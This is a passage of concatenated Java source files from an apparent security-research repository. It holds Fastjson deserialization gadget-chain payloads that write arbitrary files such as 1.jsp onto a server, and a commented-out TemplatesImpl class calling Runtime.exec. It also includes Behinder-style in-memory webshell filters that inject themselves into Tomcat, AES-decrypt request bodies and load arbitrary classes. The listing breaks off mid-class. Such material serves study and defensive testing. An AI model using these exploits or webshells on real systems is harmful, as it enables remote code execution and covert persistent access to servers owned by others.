 56 |         String poc4 = "{\r\n"
 57 |         		+ "		\"su16\": {\r\n"
 58 |         		+ "		                \"@type\": \"java.io.InputStream\",\r\n"
 59 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 60 |         		+ "						\"delegate\": {\r\n"
 61 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 62 |         		+ "							\"reader\": {\r\n"
 63 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
 64 |         		+ "      \"inputStream\":{\r\n"
 65 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
 66 |         		+ "        \"input\":{\r\n"
 67 |         		+ "      \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 68 |         		+ "      \"reader\":{\r\n"
 69 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
 70 |         		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\",\r\n"
 71 |         		+ "        \"start\":0,\r\n"
 72 |         		+ "        \"end\":2147483647\r\n"
 73 |         		+ "      },\r\n"
 74 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 75 |         		+ "      \"bufferSize\":1024\r\n"
 76 |         		+ "    },\r\n"
 77 |         		+ "            \"branch\":{\r\n"
 78 |         		+ "      \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
 79 |         		+ "      \"writer\":{\r\n"
 80 |         		+ "        \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
 81 |         		+ "        \"file\":\"1.jsp\",\r\n"
 82 |         		+ "        \"charsetName\":\"UTF-8\",\r\n"
 83 |         		+ "        \"append\": false\r\n"
 84 |         		+ "      },\r\n"
 85 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 86 |         		+ "      \"bufferSize\": 1024,\r\n"
 87 |         		+ "      \"writeImmediately\": true\r\n"
 88 |         		+ "    },\r\n"
 89 |         		+ "        \"closeBranch\": true\r\n"
 90 |         		+ "      },\r\n"
 91 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
 92 |         		+ "      \"lenient\":false,\r\n"
 93 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
 94 |         		+ "    },\r\n"
 95 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 96 |         		+ "							\"bufferSize\": 1024\r\n"
 97 |         		+ "						},\r\n"
 98 |         		+ "						\"boms\": [{\r\n"
 99 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
100 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
101 |         		+ "							\"bytes\": [\r\n"
102 |         		+ "								36,82\r\n"
103 |         		+ "							]\r\n"
104 |         		+ "						}]\r\n"
105 |         		+ "		},\r\n"
106 |         		+ "		\"su17\": {\r\n"
107 |         		+ "		                \"@type\": \"java.io.InputStream\",\r\n"
108 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
109 |         		+ "						\"delegate\": {\r\n"
110 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
111 |         		+ "							\"reader\": {\r\n"
112 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
113 |         		+ "      \"inputStream\":{\r\n"
114 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
115 |         		+ "        \"input\":{\"$ref\": \"$.su16.delegate.reader.inputStream.input\"},\r\n"
116 |         		+ "        \"branch\":{\"$ref\": \"$.su16.delegate.reader.inputStream.branch\"},\r\n"
117 |         		+ "        \"closeBranch\": true\r\n"
118 |         		+ "      },\r\n"
119 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
120 |         		+ "      \"lenient\":false,\r\n"
121 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
122 |         		+ "    },\r\n"
123 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
124 |         		+ "							\"bufferSize\": 1024\r\n"
125 |         		+ "						},\r\n"
126 |         		+ "						\"boms\": [{\r\n"
127 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
128 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
129 |         		+ "							\"bytes\": [\r\n"
130 |         		+ "								36,82\r\n"
131 |         		+ "							]\r\n"
132 |         		+ "						}]\r\n"
133 |         		+ "		},\r\n"
134 |         		+ "		\"su18\": {\r\n"
135 |         		+ "		                \"@type\": \"java.io.InputStream\",\r\n"
136 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
137 |         		+ "						\"delegate\": {\r\n"
138 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
139 |         		+ "							\"reader\": {\r\n"
140 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
141 |         		+ "      \"inputStream\":{\r\n"
142 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
143 |         		+ "        \"input\":{\"$ref\": \"$.su16.delegate.reader.inputStream.input\"},\r\n"
144 |         		+ "        \"branch\":{\"$ref\": \"$.su16.delegate.reader.inputStream.branch\"},\r\n"
145 |         		+ "        \"closeBranch\": true\r\n"
146 |         		+ "      },\r\n"
147 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
148 |         		+ "      \"lenient\":false,\r\n"
149 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
150 |         		+ "    },\r\n"
151 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
152 |         		+ "							\"bufferSize\": 1024\r\n"
153 |         		+ "						},\r\n"
154 |         		+ "						\"boms\": [{\r\n"
155 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
156 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
157 |         		+ "							\"bytes\": [\r\n"
158 |         		+ "								36,82\r\n"
159 |         		+ "							]\r\n"
160 |         		+ "						}]\r\n"
161 |         		+ "		},\r\n"
162 |         		+ "		\"su19\": {\r\n"
163 |         		+ "		                \"@type\": \"java.io.InputStream\",\r\n"
164 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
165 |         		+ "						\"delegate\": {\r\n"
166 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
167 |         		+ "							\"reader\": {\r\n"
168 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
169 |         		+ "      \"inputStream\":{\r\n"
170 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
171 |         		+ "        \"input\":{\"$ref\": \"$.su16.delegate.reader.inputStream.input\"},\r\n"
172 |         		+ "        \"branch\":{\"$ref\": \"$.su16.delegate.reader.inputStream.branch\"},\r\n"
173 |         		+ "        \"closeBranch\": true\r\n"
174 |         		+ "      },\r\n"
175 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
176 |         		+ "      \"lenient\":false,\r\n"
177 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
178 |         		+ "    },\r\n"
179 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
180 |         		+ "							\"bufferSize\": 1024\r\n"
181 |         		+ "						},\r\n"
182 |         		+ "						\"boms\": [{\r\n"
183 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
184 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
185 |         		+ "							\"bytes\": [\r\n"
186 |         		+ "								36,82\r\n"
187 |         		+ "							]\r\n"
188 |         		+ "						}]\r\n"
189 |         		+ "		}	\r\n"
190 |         		+ "	}\r\n"
191 |         		+ "\r\n"
192 |         		+ "";
193 |         
194 |         System.out.println(poc1);
195 |         System.out.println(poc2);
196 |         System.out.println(poc3);
197 |         System.out.println(poc4);
198 |         try {
199 |         	JSON.parseObject(poc1);
200 | 		} catch (Exception e) {
201 | 		}
202 |         JSON.parseObject(poc2);
203 |         JSON.parseObject(poc3);
204 |         JSON.parseObject(poc4);
205 |         
206 |     }
207 | }
208 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson31_xalan_dom4j_io_write_4.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | import java.io.InputStream;
  3 | import java.net.URL;
  4 | import java.util.Arrays;
  5 | import java.util.Base64;
  6 | 
  7 | import com.alibaba.fastjson.JSON;
  8 | 
  9 | 
 10 | public class Fastjson31_xalan_dom4j_io_write_4 {
 11 |     public static void main(String[] args) throws Exception {
 12 |     	String url = "file:///D:/Downloads/1.txt";
 13 |     	InputStream input = new URL(url).openStream();
 14 |     	byte[] bs = new byte[input.available()];
 15 |     	input.read(bs);
 16 |     	String test = Base64.getEncoder().encodeToString(bs);
 17 |     	byte[] testbs = test.getBytes();
 18 |     	
 19 |     	//1.2.73-1.2.80 xalan-2.7.2 dom4j-2.1.3 commons-io-2.2 aspectjtools-1.9.6 commons-codec-1.6
 20 |     	//这条链主要是为了解决1-3的io链无法写入复杂文件结构，文件依旧需要大于8kb才能写入
 21 |         String poc1 = "{\r\n"
 22 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 23 |         		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
 24 |         		+ "}";
 25 |         String poc2 = "{\r\n"
 26 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 27 |         		+ "		\"val\": {\r\n"
 28 |         		+ "			\"@type\": \"java.lang.String\" {\r\n"
 29 |         		+ "				\"@type\": \"java.util.Locale\",\r\n"
 30 |         		+ "				\"val\": {\r\n"
 31 |         		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 32 |         		+ "					{\r\n"
 33 |         		+ "						\"@type\": \"java.lang.String\"\r\n"
 34 |         		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
 35 |         		+ "						\"locator\": {}\r\n"
 36 |         		+ "					}\r\n"
 37 |         		+ "				}\r\n"
 38 |         		+ "			}";
 39 |         String poc3 = "{\r\n"
 40 |         		+ "	\"su14\": {\r\n"
 41 |         		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
 42 |         		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
 43 |         		+ "		\"nodeIter\": {\r\n"
 44 |         		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
 45 |         		+ "		},\r\n"
 46 |         		+ "		\"xctxt\": {\r\n"
 47 |         		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
 48 |         		+ "			\"primaryReader\": {\r\n"
 49 |         		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
 50 |         		+ "				\"entityResolver\": {\r\n"
 51 |         		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
 52 |         		+ "					\"inputSource\": {\r\n"
 53 |         		+ "						\"byteStream\": {\r\n"
 54 |         		+ "							\"@type\": \"java.io.InputStream\"\r\n"
 55 |         		+ "						}\r\n"
 56 |         		+ "					}\r\n"
 57 |         		+ "				}\r\n"
 58 |         		+ "			}\r\n"
 59 |         		+ "		}\r\n"
 60 |         		+ "	}\r\n"
 61 |         		+ "}";
 62 |         
 63 |         String poc4 = "{\r\n"
 64 |         		+ "		\"su16\": {\r\n"
 65 |         		+ "    \"@type\": \"java.io.InputStream\",\r\n"
 66 |         		+ "  \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n"
 67 |         		+ "  \"delegate\":{\r\n"
 68 |         		+ "    \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
 69 |         		+ "    \"input\":{\r\n"
 70 |         		+ "      \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n"
 71 |         		+ "      \"in\":{\r\n"
 72 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n"
 73 |         		+ "        \"charset\":\"utf-8\",\r\n"
 74 |         		+ "        \"bufferSize\": 1024,\r\n"
 75 |     			+ "        \"s\":{\"@type\":\"java.lang.String\"\""+test+"\"\r\n"
 76 |         		+ "      },\r\n"
 77 |         		+ "      \"doEncode\":false,\r\n"
 78 |         		+ "      \"lineLength\":1024,\r\n"
 79 |         		+ "      \"lineSeparator\":\"5ZWKCg==\",\r\n"
 80 |         		+ "      \"decodingPolicy\":0\r\n"
 81 |         		+ "    },\r\n"
 82 |         		+ "    \"branch\":{\r\n"
 83 |         		+ "      \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n"
 84 |         		+ "      \"targetPath\":\"1.txt\"\r\n"
 85 |         		+ "    },\r\n"
 86 |         		+ "    \"closeBranch\":true\r\n"
 87 |         		+ "  },\r\n"
 88 |         		+ "  \"include\":true,\r\n"
 89 |         		+ "  \"boms\":[{\r\n"
 90 |         		+ "                  \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 91 |         		+ "                  \"charsetName\": \"UTF-8\",\r\n"
 92 |     			+ "                  \"bytes\":"+Arrays.toString(testbs)+"\r\n"
 93 |         		+ "                }],\r\n"
 94 |         		+ "},\r\n"
 95 |         		+ "		\"su17\": {\r\n"
 96 |         		+ "			\"$ref\": \"$.su16.bOM.bytes\"\r\n"
 97 |         		+ "		}\r\n"
 98 |         		+ "	}";
 99 |         
100 |         System.out.println(poc1);
101 |         System.out.println(poc2);
102 |         System.out.println(poc3);
103 |         System.out.println(poc4);
104 |         try {
105 |         	JSON.parseObject(poc1);
106 | 		} catch (Exception e) {
107 | 		}
108 |         JSON.parseObject(poc2);
109 |         JSON.parseObject(poc3);
110 |         JSON.parseObject(poc4);
111 |         
112 |     }
113 | }
114 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson32_python_pgsql.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import com.alibaba.fastjson.JSON;
 3 | 
 4 | public class Fastjson32_python_pgsql {
 5 |     public static void main(String[] args){
 6 | 
 7 |         //依赖1.2.76-1.2.80，依赖rhq-scripting-python-4.13.0(非常冷门)/postgresql-42.3.1，pgsql可替换为mysql
 8 |         String poc1 ="{\r\n"
 9 |         		+ "	\"@type\":\"java.lang.Exception\",\r\n"
10 |         		+ "    \"@type\":\"org.python.antlr.ParseException\"\r\n"
11 |         		+ "}";
12 | 
13 | 
14 |     String poc2 = "{\r\n"
15 |     		+ "	\"@type\": \"java.lang.Class\",\r\n"
16 |     		+ "	\"val\": {\r\n"
17 |     		+ "		\"@type\": \"java.lang.String\" {\r\n"
18 |     		+ "			\"@type\": \"java.util.Locale\",\r\n"
19 |     		+ "			\"val\": {\r\n"
20 |     		+ "				\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
21 |     		+ "				{\r\n"
22 |     		+ "					\"@type\": \"java.lang.String\"\r\n"
23 |     		+ "					\"@type\": \"org.python.antlr.ParseException\",\r\n"
24 |     		+ "					\"type\": \"{\\\"@type\\\":\\\"com.ziclix.python.sql.PyConnection\\\",\\\"connection\\\":{\\\"@type\\\":\\\"org.postgresql.jdbc.PgConnection\\\"}}\"\r\n"
25 |     		+ "				}\r\n"
26 |     		+ "			}\r\n"
27 |     		+ "		}\r\n"
28 |     		+ "	}\r\n"
29 |     		+ "}";
30 | 
31 |    String poc3 = "{\r\n"
32 |    		+ "	\"@type\": \"org.postgresql.jdbc.PgConnection\",\r\n"
33 |    		+ "	\"hostSpecs\": [{\r\n"
34 |    		+ "		\"host\": \"127.0.0.1\",\r\n"
35 |    		+ "		\"port\": 2333\r\n"
36 |    		+ "	}],\r\n"
37 |    		+ "	\"user\": \"test\",\r\n"
38 |    		+ "	\"database\": \"test\",\r\n"
39 |    		+ "	\"info\": {\r\n"
40 |    		+ "		\"socketFactory\": \"java.io.FileOutputStream\",\r\n"
41 |    		+ "		\"socketFactoryArg\": \"1.txt\"\r\n"
42 |    		+ "	},\r\n"
43 |    		+ "	\"url\": \"\"\r\n"
44 |    		+ "}";
45 |    
46 |    
47 |    
48 |        System.out.println(poc1);
49 |        System.out.println(poc2);
50 |        System.out.println(poc3);
51 |        
52 |        JSON.parseObject(poc1);
53 |        try {
54 |     	   JSON.parseObject(poc2);
55 | 	} catch (Exception e) {
56 | 		// TODO: handle exception
57 | 	}
58 |     	   
59 |        JSON.parseObject(poc3);
60 |        
61 |     }
62 | }
63 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/TemplatesImplcmd.java:
--------------------------------------------------------------------------------
 1 | //package com.shiro.vuln.fastjson;
 2 | //
 3 | //import com.sun.org.apache.xalan.internal.xsltc.DOM;
 4 | //import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 5 | //import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
 6 | //import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 7 | //import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 8 | //
 9 | //public class TemplatesImplcmd extends AbstractTranslet {
10 | //    public TemplatesImplcmd() throws Exception {
11 | //        Runtime.getRuntime().exec("calc");
12 | //    }
13 | //    @Override
14 | //    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
15 | //    }
16 | //    @Override
17 | //    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
18 | //    }
19 | //}
20 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/filter/MemBehinder3.java:
--------------------------------------------------------------------------------
  1 | /*
  2 | package com.shiro.vuln.filter;
  3 | 
  4 | //
  5 | // Source code recreated from a .class file by IntelliJ IDEA
  6 | // (powered by FernFlower decompiler)
  7 | //
  8 | 
  9 | import org.apache.catalina.LifecycleState;
 10 | import org.apache.catalina.core.ApplicationContext;
 11 | import org.apache.catalina.core.StandardContext;
 12 | import org.apache.catalina.util.LifecycleBase;
 13 | import sun.misc.BASE64Decoder;
 14 | 
 15 | import javax.crypto.Cipher;
 16 | import javax.crypto.spec.SecretKeySpec;
 17 | import javax.servlet.*;
 18 | import javax.servlet.annotation.WebFilter;
 19 | import javax.servlet.http.HttpServletRequest;
 20 | import javax.servlet.http.HttpServletResponse;
 21 | import javax.servlet.http.HttpSession;
 22 | import java.io.IOException;
 23 | import java.lang.reflect.Field;
 24 | import java.lang.reflect.Method;
 25 | import java.math.BigInteger;
 26 | import java.security.MessageDigest;
 27 | import java.util.EnumSet;
 28 | import java.util.HashMap;
 29 | 
 30 | //@WebFilter
 31 | public class MemBehinder3 extends ClassLoader implements Filter {
 32 |     public String passwd = "shell@2021";
 33 |     public String tpath = "/favicon.ico";
 34 |     public String cs = "UTF-8";
 35 |     public HttpServletRequest request = null;
 36 |     public HttpServletResponse response = null;
 37 | 
 38 |     public MemBehinder3(ClassLoader var1) {
 39 |         super(var1);
 40 |     }
 41 | 
 42 |     public MemBehinder3() {
 43 |     }
 44 | 
 45 |     public void init(FilterConfig var1) throws ServletException {
 46 |     }
 47 | 
 48 |     public static String md5(String var0) {
 49 |         String var1 = null;
 50 | 
 51 |         try {
 52 |             MessageDigest var2 = MessageDigest.getInstance("MD5");
 53 |             var2.update(var0.getBytes(), 0, var0.length());
 54 |             var1 = (new BigInteger(1, var2.digest())).toString(16).toUpperCase();
 55 |         } catch (Exception var4) {
 56 |         }
 57 | 
 58 |         return var1.substring(0, 16).toLowerCase();
 59 |     }
 60 | 
 61 |     public Class g(byte[] var1) {
 62 |         return super.defineClass(var1, 0, var1.length);
 63 |     }
 64 | 
 65 |     public void parseObj(Object var1) {
 66 |         if (var1.getClass().isArray()) {
 67 |             Object[] var2 = (Object[])((Object[])var1);
 68 |             this.request = (HttpServletRequest)var2[0];
 69 |             this.response = (HttpServletResponse)var2[1];
 70 |         } else {
 71 |             try {
 72 |                 Class var3 = Class.forName("javax.servlet.jsp.PageContext");
 73 |                 this.request = (HttpServletRequest)var3.getDeclaredMethod("getRequest", (Class[])null).invoke(var1, (Object[])null);
 74 |                 this.response = (HttpServletResponse)var3.getDeclaredMethod("getResponse", (Class[])null).invoke(var1, (Object[])null);
 75 |             } catch (Exception var12) {
 76 |                 if (var1 instanceof HttpServletRequest) {
 77 |                     this.request = (HttpServletRequest)var1;
 78 | 
 79 |                     try {
 80 |                         Field var5 = this.request.getClass().getDeclaredField("request");
 81 |                         var5.setAccessible(true);
 82 |                         HttpServletRequest var6 = (HttpServletRequest)var5.get(this.request);
 83 |                         Field var7 = var6.getClass().getDeclaredField("response");
 84 |                         var7.setAccessible(true);
 85 |                         this.response = (HttpServletResponse)var7.get(var6);
 86 |                     } catch (Exception var11) {
 87 |                         try {
 88 |                             this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse", (Class[])null).invoke(var1, (Object[])null);
 89 |                         } catch (Exception var10) {
 90 |                         }
 91 |                     }
 92 |                 }
 93 |             }
 94 |         }
 95 | 
 96 |     }
 97 | 
 98 |     public void doFilter(ServletRequest var1, ServletResponse var2, FilterChain var3) throws IOException, ServletException {
 99 |         HttpServletRequest var4 = (HttpServletRequest)var1;
100 |         HttpServletResponse var5 = (HttpServletResponse)var2;
101 |         HttpSession var6 = var4.getSession();
102 |         HashMap var7 = new HashMap();
103 |         var7.put("request", var4);
104 |         var7.put("response", var5);
105 |         var7.put("session", var6);
106 |         System.out.println(111);
107 |         var5.setHeader("inject", "success");
108 |         String var8 = md5(this.passwd);
109 |         var6.putValue("u", var8);
110 | 
111 |         try {
112 |             Cipher var9 = Cipher.getInstance("AES");
113 |             SecretKeySpec var10 = new SecretKeySpec(var8.getBytes(), "AES");
114 |             var9.init(2, var10);
115 |             String var11 = var4.getReader().readLine();
116 |             Method var12 = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
117 |             var12.setAccessible(true);
118 |             byte[] var13 = var9.doFinal((new BASE64Decoder()).decodeBuffer(var11));
119 |             Class var14 = (Class)var12.invoke(this.getClass().getClassLoader(), var13, new Integer(0), new Integer(var13.length));
120 |             var14.newInstance().equals(var7);
121 |         } catch (Exception var16) {
122 |             var16.printStackTrace();
123 |         }
124 | 
125 |         var3.doFilter(var4, var5);
126 |     }
127 | 
128 |     public void destroy() {
129 |     }
130 | 
131 |     public static String addFilter(Filter var0, String var1, String var2, HttpServletRequest var3) throws IllegalAccessException {
132 |         ServletContext var4 = var3.getServletContext();
133 |         if (var4.getFilterRegistration(var1) == null) {
134 |             Field var5 = null;
135 |             ApplicationContext var6 = null;
136 |             StandardContext var7 = null;
137 |             Field var8 = null;
138 |             FilterRegistration.Dynamic var9 = null;
139 | 
140 |             String var10;
141 |             try {
142 |                 var5 = var4.getClass().getDeclaredField("context");
143 |                 var5.setAccessible(true);
144 |                 var6 = (ApplicationContext)var5.get(var4);
145 |                 var5 = var6.getClass().getDeclaredField("context");
146 |                 var5.setAccessible(true);
147 |                 var7 = (StandardContext)var5.get(var6);
148 |                 var8 = LifecycleBase.class.getDeclaredField("state");
149 |                 var8.setAccessible(true);
150 |                 var8.set(var7, LifecycleState.STARTING_PREP);
151 |                 var9 = var4.addFilter(var1, var0);
152 |                 var9.addMappingForUrlPatterns(EnumSet.of(DispatcherType.REQUEST), false, new String[]{var2});
153 |                 Method var11 = StandardContext.class.getMethod("filterStart", (Class[])null);
154 |                 var11.setAccessible(true);
155 |                 var11.invoke(var7, (Object[])null);
156 |                 var8.set(var7, LifecycleState.STARTED);
157 |                 var10 = null;
158 | 
159 |                 Class var12;
160 |                 try {
161 |                     var12 = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
162 |                 } catch (Exception var26) {
163 |                     var12 = Class.forName("org.apache.catalina.deploy.FilterMap");
164 |                 }
165 | 
166 |                 if (var12 != null) {
167 |                     Method var14 = var7.getClass().getMethod("findFilterMaps", (Class[])null);
168 |                     Object[] var15 = (Object[])var14.invoke(var7, (Object[])null);
169 |                     Object[] var16 = new Object[var15.length];
170 |                     int var17 = 1;
171 | 
172 |                     for(int var18 = 0; var18 < var15.length; ++var18) {
173 |                         Object var19 = var15[var18];
174 |                         var14 = var12.getMethod("getFilterName", (Class[])null);
175 |                         String var20 = (String)var14.invoke(var19, (Object[])null);
176 |                         if (var20.equalsIgnoreCase(var20)) {
177 |                             var16[0] = var19;
178 |                         } else {
179 |                             var16[var17++] = var15[var18];
180 |                         }
181 |                     }
182 | 
183 |                     System.arraycopy(var16, 0, var15, 0, var15.length);
184 |                 }
185 | 
186 |                 String var21 = "inject success";
187 |                 return var21;
188 |             } catch (Exception var27) {
189 |                 var10 = var27.getMessage();
190 |             } finally {
191 |                 var8.set(var7, LifecycleState.STARTED);
192 |             }
193 | 
194 |             return var10;
195 |         } else {
196 |             return "Filter already exists";
197 |         }
198 |     }
199 | 
200 |     public boolean equals(Object var1) {
201 |         this.parseObj(var1);
202 |         StringBuffer var2 = new StringBuffer();
203 |         String var3 = "->|";
204 |         String var4 = "|<-";
205 | 
206 |         try {
207 |             this.response.setContentType("text/html");
208 |             this.request.setCharacterEncoding(this.cs);
209 |             this.response.setCharacterEncoding(this.cs);
210 |             var2.append(addFilter(this, "MemBehinder387532587899179", "this.tpath", this.request));
211 |         } catch (Exception var8) {
212 |             var2.append("ERROR:// " + var8.toString());
213 |         }
214 | 
215 |         try {
216 |             this.response.getWriter().print(var3 + var2.toString() + var4);
217 |             this.response.getWriter().flush();
218 |             this.response.getWriter().close();
219 |         } catch (Exception var7) {
220 |         }
221 | 
222 |         return true;
223 |     }
224 | }
225 | */
226 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/filter/MemBehinderFilter.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.filter;
  2 | 
  3 | import org.apache.catalina.LifecycleState;
  4 | import org.apache.catalina.core.ApplicationContext;
  5 | import org.apache.catalina.core.StandardContext;
  6 | import org.apache.catalina.util.LifecycleBase;
  7 | 
  8 | import javax.crypto.Cipher;
  9 | import javax.crypto.spec.SecretKeySpec;
 10 | import javax.servlet.*;
 11 | import javax.servlet.annotation.WebFilter;
 12 | import javax.servlet.http.HttpServletRequest;
 13 | import javax.servlet.http.HttpServletResponse;
 14 | import javax.servlet.http.HttpSession;
 15 | import java.io.IOException;
 16 | import java.lang.reflect.Field;
 17 | import java.lang.reflect.Method;
 18 | import java.math.BigInteger;
 19 | import java.security.MessageDigest;
 20 | import java.util.EnumSet;
 21 | import java.util.HashMap;
 22 | import java.util.Map;
 23 | 
 24 | /**
 25 |  * 新冰蝎内存马
 26 |  */
 27 | public final class MemBehinderFilter extends ClassLoader implements Filter {
 28 |     public HttpServletRequest request = null;
 29 |     public HttpServletResponse response = null;
 30 |     public String cs = "UTF-8";
 31 |     public String Pwd = "eac9fa38330a7535";
 32 |     public String path = "/favicondemo.ico";
 33 | 
 34 |     public MemBehinderFilter() {
 35 |     }
 36 | 
 37 |     public MemBehinderFilter(ClassLoader c) {
 38 |         super(c);
 39 |     }
 40 | 
 41 |     public Class g(byte[] b) {
 42 |         return super.defineClass(b, 0, b.length);
 43 |     }
 44 | 
 45 |     public static String md5(String s) {
 46 |         String ret = null;
 47 | 
 48 |         try {
 49 |             MessageDigest m = MessageDigest.getInstance("MD5");
 50 |             m.update(s.getBytes(), 0, s.length());
 51 |             ret = (new BigInteger(1, m.digest())).toString(16).substring(0, 16);
 52 |         } catch (Exception var3) {
 53 |         }
 54 | 
 55 |         return ret;
 56 |     }
 57 | 
 58 |     public boolean equals(Object obj) {
 59 |         this.parseObj(obj);
 60 |         this.Pwd = md5(this.request.getHeader("p"));
 61 |         this.path = this.request.getHeader("path");
 62 |         StringBuffer output = new StringBuffer();
 63 |         String tag_s = "->|";
 64 |         String tag_e = "|<-";
 65 | 
 66 |         try {
 67 |             this.response.setContentType("text/html");
 68 |             this.request.setCharacterEncoding(this.cs);
 69 |             this.response.setCharacterEncoding(this.cs);
 70 |             output.append(this.addFilter());
 71 |         } catch (Exception var7) {
 72 |             output.append("ERROR:// " + var7.toString());
 73 |         }
 74 | 
 75 |         try {
 76 |             this.response.getWriter().print(tag_s + output.toString() + tag_e);
 77 |             this.response.getWriter().flush();
 78 |             this.response.getWriter().close();
 79 |         } catch (Exception var6) {
 80 |         }
 81 | 
 82 |         return true;
 83 |     }
 84 | 
 85 | 
 86 | 
 87 |     public void parseObj(Object obj) {
 88 |         if (obj.getClass().isArray()) {
 89 |             Object[] data = (Object[])((Object[])obj);
 90 |             this.request = (HttpServletRequest)data[0];
 91 |             this.response = (HttpServletResponse)data[1];
 92 |         } else {
 93 |             try {
 94 |                 Class clazz = Class.forName("javax.servlet.jsp.PageContext");
 95 |                 this.request = (HttpServletRequest)clazz.getDeclaredMethod("getRequest").invoke(obj);
 96 |                 this.response = (HttpServletResponse)clazz.getDeclaredMethod("getResponse").invoke(obj);
 97 |             } catch (Exception var8) {
 98 |                 if (obj instanceof HttpServletRequest) {
 99 |                     this.request = (HttpServletRequest)obj;
100 | 
101 |                     try {
102 |                         Field req = this.request.getClass().getDeclaredField("request");
103 |                         req.setAccessible(true);
104 |                         HttpServletRequest request2 = (HttpServletRequest)req.get(this.request);
105 |                         Field resp = request2.getClass().getDeclaredField("response");
106 |                         resp.setAccessible(true);
107 |                         this.response = (HttpServletResponse)resp.get(request2);
108 |                     } catch (Exception var7) {
109 |                         try {
110 |                             this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse").invoke(obj);
111 |                         } catch (Exception var6) {
112 |                         }
113 |                     }
114 |                 }
115 |             }
116 |         }
117 |     }
118 | 
119 |     public String addFilter() throws Exception {
